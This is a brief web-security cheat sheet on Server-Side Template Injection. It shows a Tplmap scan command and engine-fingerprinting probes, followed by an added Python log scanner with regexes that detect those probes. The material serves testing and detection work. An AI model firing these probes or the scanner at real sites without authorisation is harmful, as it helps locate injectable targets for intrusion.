SSTI (Server-Side Template Injection)
Last modified: 2022-12-01
Web
Automation
Tplmap is a tool that automates testing for Server-Side Template Injection and code injection. Quote the URL so the shell does not treat the ? as a glob character:
./tplmap.py -u 'http://vulnerable.com/?name=test'
Identify the Template Engine
a{*comment*}b -> Smarty
${"z".join("ab")} -> Mako or ???
{{ '7'*7 }} -> Jinja2 or Twig or ???
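
On the detection side, the same three probes leave recognisable delimiters in request logs. The following is an added example, not code from the original page or from Tplmap: it URL-decodes query parameters (including nested encoding) and flags the probe shapes listed above. The function names, the combined log format and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Delimiter shapes of the three fingerprint probes listed above.
PROBE_PATTERNS = {
    "smarty-comment": re.compile(r"\{\*.*?\*\}"),       # a{*comment*}b
    "dollar-brace-expr": re.compile(r"\$\{[^}]+\}"),    # ${"z".join("ab")}
    "double-brace-expr": re.compile(r"\{\{.+?\}\}"),    # {{ '7'*7 }}
}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2022:10:00:00 +0000] "GET /?name=test HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Dec/2022:10:00:01 +0000] "GET /?name=a%7B*comment*%7Db HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Dec/2022:10:00:02 +0000] "GET /?name=%24%7B%22z%22.join(%22ab%22)%7D HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Dec/2022:10:00:03 +0000] "GET /?name=%257B%257B%20%277%27*7%20%257D%257D HTTP/1.1" 200 512',
]

def decode_fully(value, max_rounds=3):
    """Undo nested URL-encoding (%257B -> %7B -> {), bounded to a few rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssti_probes(log_line):
    """Return sorted (parameter, pattern_name) hits for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = set()
    query = urlsplit(match.group(1)).query
    # parse_qsl decodes once; decode_fully removes any remaining layers.
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)
        for label, pattern in PROBE_PATTERNS.items():
            if pattern.search(value):
                hits.add((name, label))
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(find_ssti_probes(line))
```

Treat hits as triage signals rather than verdicts: `{{ ... }}` also appears in legitimate client-side template content.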